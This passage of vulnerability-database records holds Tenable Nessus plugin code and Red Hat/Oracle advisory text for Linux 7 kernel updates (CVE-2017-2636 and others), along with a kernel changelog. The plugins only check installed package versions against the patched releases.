Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0933.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?96946551\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0933\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel / kernel-abi-whitelists / kernel-debug / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.16.1.vl7\",\n \"kernel-abi-whitelists-3.10.0-514.16.1.vl7\",\n \"kernel-debug-3.10.0-514.16.1.vl7\",\n \"kernel-debug-devel-3.10.0-514.16.1.vl7\",\n \"kernel-devel-3.10.0-514.16.1.vl7\",\n \"kernel-doc-3.10.0-514.16.1.vl7\",\n \"kernel-headers-3.10.0-514.16.1.vl7\",\n \"kernel-tools-3.10.0-514.16.1.vl7\",\n \"kernel-tools-libs-3.10.0-514.16.1.vl7\",\n \"kernel-tools-libs-devel-3.10.0-514.16.1.vl7\",\n \"perf-3.10.0-514.16.1.vl7\",\n \"python-perf-3.10.0-514.16.1.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:26:37", "references": ["https://oss.oracle.com/pipermail/el-errata/2017-April/006830.html"], "pluginID": "99333", "description": "From Red Hat Security Advisory 2017:0933 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).", "edition": 10, "reporter": "Tenable", "published": "2017-04-13T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2017-0933)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2018-07-24T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2017-0933.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99333", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:0933 and \n# Oracle Linux Security Advisory ELSA-2017-0933 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99333);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2018/07/24 18:56:12\");\n\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n script_xref(name:\"RHSA\", value:\"2017:0933\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2017-0933)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:0933 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-April/006830.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.16.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:26:39", "references": ["https://oss.oracle.com/pipermail/el-errata/2017-April/006863.html"], "pluginID": "99386", "description": "Description of changes:\n\n- [3.10.0-514.16.1.0.1.el7.OL7]\n- [ipc] ipc/sem.c: bugfix for semctl(,,GETZCNT) (Manfred Spraul) [orabug \n22552377]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel \n(olkmod_signing_key.x509)(<A HREF='https://oss.oracle.com/mailman/listinfo/el-errata'>alexey.petrenko at oracle.com</A>)\n- Update x509.genkey [bug 24817676]\n\n[3.10.0-514.16.1.el7]\n- [tty] n_hdlc: get rid of racy n_hdlc.tbuf ('Herton R. Krzesinski') \n[1429919 1429920] {CVE-2017-2636}\n- [md] dm rq: cope with DM device destruction while in \ndm_old_request_fn() (Mike Snitzer) [1430334 1412854]\n- [fs] nfs: Fix inode corruption in nfs_prime_dcache() (Benjamin \nCoddington) [1429514 1416532]\n- [fs] nfs: Don't let readdirplus revalidate an inode that was marked as \nstale (Benjamin Coddington) [1429514 1416532]\n- [block] Copy a user iovec if it includes gaps (Jeff Moyer) [1429508 \n1421263]\n- [kernel] percpu-refcount: fix reference leak during percpu-atomic \ntransition (Jeff Moyer) [1429507 1418333]\n- [powerpc] eeh: eeh_pci_enable(): fix checking of post-request state \n(Steve Best) [1425538 1383670]\n- [s390] mm: handle PTE-mapped tail pages in fast gup (Hendrik \nBrueckner) [1423438 1391532]\n- [net] skbuff: Fix skb checksum partial check (Lance Richardson) \n[1422964 1411480]\n- [net] skbuff: Fix skb checksum flag on skb pull (Lance Richardson) \n[1422964 1411480]\n- [security] selinux: fix off-by-one in setprocattr (Paul Moore) \n[1422368 1422369] {CVE-2017-2618}\n- [virtio] balloon: check the number of available pages in leak balloon \n(David Hildenbrand) [1417194 1401615]\n- [infiniband] ib/rdmavt: Only put mmap_info ref if it exists (Jonathan \nToppins) [1417191 1391299]\n- [x86] kvm: x86: make lapic hrtimer pinned (Luiz Capitulino) [1416373 \n1392593]\n- [kernel] sched/nohz: Fix affine unpinned timers mess (Luiz Capitulino) \n[1416373 1392593]\n- [kernel] nohz: Affine unpinned timers to housekeepers (Luiz \nCapitulino) [1416373 1392593]\n- [kernel] tick-sched: add housekeeping_mask cpumask (Luiz Capitulino) \n[1416373 1392593]\n- [x86] platform/uv/bau: Add UV4-specific functions (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Fix payload queue setup on UV4 hardware (Frank \nRamsay) [1414715 1386692]\n- [x86] platform/uv/bau: Disable software timeout on UV4 hardware (Frank \nRamsay) [1414715 1386692]\n- [x86] platform/uv/bau: Populate ->uvhub_version with UV4 version \ninformation (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Use generic function pointers (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Add generic function pointers (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Convert uv_physnodeaddr() use to \nuv_gpa_to_offset() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up pq_init() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up and update printks (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Clean up vertical alignment (Frank Ramsay) \n[1414715 1386692]\n- [virtio] virtio-pci: alloc only resources actually used (Laurent \nVivier) [1413093 1375153]\n- [net] avoid signed overflows for SO_{SND|RCV}BUFFORCE (Sabrina \nDubroca) [1412473 1412474] {CVE-2016-9793}\n- [netdrv] sfc: clear napi_hash state when copying channels (Jarod \nWilson) [1401461 1394304]\n- [lib] mpi: Fix NULL ptr dereference in mpi_powm() (Mateusz Guzik) \n[1398457 1398458] {CVE-2016-8650}\n- [scsi] lpfc: Fix eh_deadline setting for sli3 adapters (Ewan Milne) \n[1430687 1366564]\n- [md] dm round robin: revert 'use percpu 'repeat_count' and \n'current_path'' (Mike Snitzer) [1430689 1422567]\n- [md] dm round robin: do not use this_cpu_ptr() without having \npreemption disabled (Mike Snitzer) [1430689 1422567]\n- Revert: [x86] Handle non enumerated CPU after physical hotplug (Prarit \nBhargava) [1426633 1373738]\n- Revert: [x86] smp: Don't try to poke disabled/non-existent APIC \n(Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] smpboot: Init apic mapping before usage (Prarit \nBhargava) [1426633 1373738]\n- Revert: [x86] revert 'perf/uncore: Disable uncore on kdump kernel' \n(Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] perf/x86/intel/uncore: Fix hardcoded socket 0 assumption \nin the Haswell init code (Prarit Bhargava) [1426633 1373738]", "edition": 6, "reporter": "Tenable", "published": "2017-04-14T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2017-0933-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2018-09-17T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2017-0933-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99386", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-0933-1.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99386);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2017-0933-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n- [3.10.0-514.16.1.0.1.el7.OL7]\n- [ipc] ipc/sem.c: bugfix for semctl(,,GETZCNT) (Manfred Spraul) [orabug \n22552377]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel \n(olkmod_signing_key.x509)(<A HREF='https://oss.oracle.com/mailman/listinfo/el-errata'>alexey.petrenko at oracle.com</A>)\n- Update x509.genkey [bug 24817676]\n\n[3.10.0-514.16.1.el7]\n- [tty] n_hdlc: get rid of racy n_hdlc.tbuf ('Herton R. Krzesinski') \n[1429919 1429920] {CVE-2017-2636}\n- [md] dm rq: cope with DM device destruction while in \ndm_old_request_fn() (Mike Snitzer) [1430334 1412854]\n- [fs] nfs: Fix inode corruption in nfs_prime_dcache() (Benjamin \nCoddington) [1429514 1416532]\n- [fs] nfs: Don't let readdirplus revalidate an inode that was marked as \nstale (Benjamin Coddington) [1429514 1416532]\n- [block] Copy a user iovec if it includes gaps (Jeff Moyer) [1429508 \n1421263]\n- [kernel] percpu-refcount: fix reference leak during percpu-atomic \ntransition (Jeff Moyer) [1429507 1418333]\n- [powerpc] eeh: eeh_pci_enable(): fix checking of post-request state \n(Steve Best) [1425538 1383670]\n- [s390] mm: handle PTE-mapped tail pages in fast gup (Hendrik \nBrueckner) [1423438 1391532]\n- [net] skbuff: Fix skb checksum partial check (Lance Richardson) \n[1422964 1411480]\n- [net] skbuff: Fix skb checksum flag on skb pull (Lance Richardson) \n[1422964 1411480]\n- [security] selinux: fix off-by-one in setprocattr (Paul Moore) \n[1422368 1422369] {CVE-2017-2618}\n- [virtio] balloon: check the number of available pages in leak balloon \n(David Hildenbrand) [1417194 1401615]\n- [infiniband] ib/rdmavt: Only put mmap_info ref if it exists (Jonathan \nToppins) [1417191 1391299]\n- [x86] kvm: x86: make lapic hrtimer pinned (Luiz Capitulino) [1416373 \n1392593]\n- [kernel] sched/nohz: Fix affine unpinned timers mess (Luiz Capitulino) \n[1416373 1392593]\n- [kernel] nohz: Affine unpinned timers to housekeepers (Luiz \nCapitulino) [1416373 1392593]\n- [kernel] tick-sched: add housekeeping_mask cpumask (Luiz Capitulino) \n[1416373 1392593]\n- [x86] platform/uv/bau: Add UV4-specific functions (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Fix payload queue setup on UV4 hardware (Frank \nRamsay) [1414715 1386692]\n- [x86] platform/uv/bau: Disable software timeout on UV4 hardware (Frank \nRamsay) [1414715 1386692]\n- [x86] platform/uv/bau: Populate ->uvhub_version with UV4 version \ninformation (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Use generic function pointers (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Add generic function pointers (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Convert uv_physnodeaddr() use to \nuv_gpa_to_offset() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up pq_init() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up and update printks (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Clean up vertical alignment (Frank Ramsay) \n[1414715 1386692]\n- [virtio] virtio-pci: alloc only resources actually used (Laurent \nVivier) [1413093 1375153]\n- [net] avoid signed overflows for SO_{SND|RCV}BUFFORCE (Sabrina \nDubroca) [1412473 1412474] {CVE-2016-9793}\n- [netdrv] sfc: clear napi_hash state when copying channels (Jarod \nWilson) [1401461 1394304]\n- [lib] mpi: Fix NULL ptr dereference in mpi_powm() (Mateusz Guzik) \n[1398457 1398458] {CVE-2016-8650}\n- [scsi] lpfc: Fix eh_deadline setting for sli3 adapters (Ewan Milne) \n[1430687 1366564]\n- [md] dm round robin: revert 'use percpu 'repeat_count' and \n'current_path'' (Mike Snitzer) [1430689 1422567]\n- [md] dm round robin: do not use this_cpu_ptr() without having \npreemption disabled (Mike Snitzer) [1430689 1422567]\n- Revert: [x86] Handle non enumerated CPU after physical hotplug (Prarit \nBhargava) [1426633 1373738]\n- Revert: [x86] smp: Don't try to poke disabled/non-existent APIC \n(Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] smpboot: Init apic mapping before usage (Prarit \nBhargava) [1426633 1373738]\n- Revert: [x86] revert 'perf/uncore: Disable uncore on kdump kernel' \n(Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] perf/x86/intel/uncore: Fix hardcoded socket 0 assumption \nin the Haswell init code (Prarit Bhargava) [1426633 1373738]\"\n 